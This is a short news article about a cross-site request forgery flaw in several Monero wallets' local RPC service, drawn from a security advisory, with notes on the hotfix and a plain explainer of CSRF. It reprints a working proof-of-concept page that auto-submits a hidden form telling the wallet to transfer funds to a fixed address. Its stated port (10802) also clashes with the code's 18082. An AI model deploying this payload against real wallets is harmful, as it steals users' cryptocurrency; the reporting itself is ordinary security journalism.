Owing to its additional privacy and security features, Monero is notably giving Bitcoin a tough competition as a darknet currency. However, a recent security alert has indicated that even though Monero transactions are safe and secure, the wallets aren’t.

MWR Labs, a cybersecurity company, had released an advisory earlier this month stating the presence of a Cross Site request Forgery vulnerability. The vulnerability could potentially allow attackers to remotely steal Monero cryptocurrency from users who are using the compromised version of wallet. The list of vulnerable wallets included – Monero SimpleWallet, LightWallet, Wallet Chrome, GUI Client.net, Minonodo and other wallets for JS, NodeJS, and QT.

All these vulnerable wallets were known to host an RPC web service on the local host – port 10802 – which eliminated the need for user authentication during payment initiation. MWR Labs, in its advisory, also posted the code snippet that can be used to exploit the vulnerability. Here is what it looks like:

<html> <form action=http://127.0.0.1:18082/json_rpc method=post enctype="text/plain" name="pay" > <input name='{"jsonrpc":"2.0","id":"0","method":"transfer","params":{"destinations":[{"amount":100000000000,"address":"49FuXtv95dkZj5aDaoWkbjQRv9Qu6UMwAAJKP68vksbpRJEPNZfkr6Ecbj9wrqG4xHAiMArmpGsxRbkmxAC8NEydBEvc162"}],"fee":000000000000,"mixin":3,"unlock_time":0,"payment_id":"","get_tx_key":true}}' type='hidden'> </form> <script> document.pay.submit() </script> </html>

Since the issue was made public, the team behind Monero cryptocurrency have fixed the issue by releasing a hotfix. The hotfix, now available on GitHub, is compatible only with platform-owned wallet versions. It is still not clear whether any of the third party wallet services were affected by the aforementioned vulnerability. Even if they were, whether the hotfix is applicable for their services is also another question that still has to be answered.

Meanwhile, the Monero community should update their wallets to ensure its security. Those using third party wallet services, unsure about the security of their wallets should switch to native Monero wallet client until the wallet service provider confirms the wallet’s security status.

What is Cross Site Request Forgery

Also known as the one-click attack or session riding, Cross Site Request Forgery is a malicious attack where the attacker forces the user’s browser to execute unauthorized commands. These commands may be directed against web applications or services. In this case, the Cross Site Request Forgery could be used by the attacker to make payments from the user’s wallet to his/her own wallet.

Ref: MWR InfoSecurity | CSRF |Image: Monero